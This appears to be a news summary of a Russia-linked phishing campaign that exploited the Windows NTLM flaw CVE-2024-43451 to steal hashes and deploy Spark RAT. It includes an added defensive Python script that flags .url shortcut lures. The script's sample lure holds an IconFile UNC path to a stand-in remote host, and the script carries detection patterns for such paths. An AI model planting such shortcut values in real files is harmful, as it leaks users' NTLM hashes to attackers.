Russian Hackers Exploit New NTLM Flaw to Deploy RAT Malware via Phishing Emails

November 14, 2024 at 01:33AM

A newly patched Windows NT LAN Manager (NTLM) vulnerability (CVE-2024-43451) was exploited by a Russia-linked actor in attacks on Ukraine, enabling the theft of user hashes via infected documents. The attack involves phishing emails linking to malicious files, leading to potential financial theft within an hour of compromise.

### Meeting Takeaways – Nov 14, 2024

1. **Vulnerability Overview**:
– A newly discovered security flaw, CVE-2024-43451, affects Windows NT LAN Manager (NTLM), with a CVSS score of 6.5.
– The vulnerability has been exploited as a zero-day by actors suspected to be linked to Russia, targeting Ukraine.

2. **Exploitation Details**:
– The flaw allows for NTLMv2 hash disclosure via minimal user interaction (e.g., right-clicking or single-clicking a file).
– Microsoft released a patch for the vulnerability earlier this week.

3. **Attack Methodology**:
– The exploit is part of an attack chain distributing the Spark RAT malware.
– Malicious files were found hosted on an official Ukrainian government site and were delivered through phishing emails.
– Phishing emails imitate requests to renew academic certificates and contain a booby-trapped URL.

4. **Execution and Consequences**:
– Interacting with the malicious URL file can trigger a connection to a remote server that downloads additional malware payloads.
– The attackers can execute Pass-the-Hash attacks once they obtain NTLM hashes, potentially compromising user accounts without needing passwords.

5. **Associated Threat Actors**:
– The Ukrainian Computer Emergency Response Team (CERT-UA) identified the activity as likely connected to a Russian group (UAC-0194).
– CERT-UA also cautioned about another financially motivated threat actor (UAC-0050) using tax-related phishing to distribute remote desktop software, specifically targeting accountants in enterprises using remote banking systems.

6. **Urgent Risks**:
– The timeframe from initial attack to fund theft can be as short as one hour, increasing the urgency for organizations to address these vulnerabilities and enhance their cybersecurity measures.
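As an added example (not from the article, CERT-UA or Microsoft), a small triage script that parses a Windows Internet Shortcut (.url) file and flags fields that reference a remote host. It assumes the lure takes that form and that the URL, IconFile and WorkingDirectory fields are the ones worth inspecting; a UNC or file:// reference is reported as high severity because Windows may authenticate to it with minimal user interaction, while a plain http(s) link is reported as a remote download link.

```python
"""Triage helper for Windows Internet Shortcut (.url) lures.

Constructed example for this article, not tooling from CERT-UA or Microsoft.
Assumption: a .url file whose fields reference a remote host over UNC or
file:// is the kind of lure that can make Windows emit NTLM authentication
with minimal interaction; plain http(s) links are reported at lower severity.
"""
import configparser
import re

# Fields Windows may resolve when the shortcut is rendered or opened
# (assumption: these are the fields worth inspecting).
INSPECTED_FIELDS = ("URL", "IconFile", "WorkingDirectory")

UNC_RE = re.compile(r"^\\\\[^\\]+\\")              # \\host\share\...
FILE_HOST_RE = re.compile(r"^file://[^/]+/", re.I)  # file://host/...
HTTP_RE = re.compile(r"^https?://", re.I)


def parse_url_file(text: str) -> dict:
    """Parse the INI-style [InternetShortcut] section; {} if malformed."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep field-name case (URL, IconFile, ...)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp["InternetShortcut"])


def classify(fields: dict) -> list:
    """Return (severity, field, value) findings for remote references."""
    findings = []
    for name in INSPECTED_FIELDS:
        value = fields.get(name, "").strip()
        if not value:
            continue
        if UNC_RE.match(value) or FILE_HOST_RE.match(value):
            findings.append(("high", name, value))  # may trigger NTLM auth
        elif HTTP_RE.match(value):
            findings.append(("low", name, value))   # remote download link
    return findings


# Constructed samples: a benign shortcut and a lure-style one (TEST-NET IP).
BENIGN = "[InternetShortcut]\nURL=https://example.org/docs\n"
LURE = ("[InternetShortcut]\nURL=http://203.0.113.10/renew.pdf\n"
        "IconFile=\\\\203.0.113.10\\share\\icon.ico\nIconIndex=1\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("lure", LURE)):
        print(label, classify(parse_url_file(sample)))
```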

### Recommendations:
– Organizations should immediately update their systems with the latest Microsoft patches.
– Increased vigilance against phishing attempts is essential, particularly for employees in finance and related fields.
– Regular training and awareness programs about cyber threats should be conducted for staff.
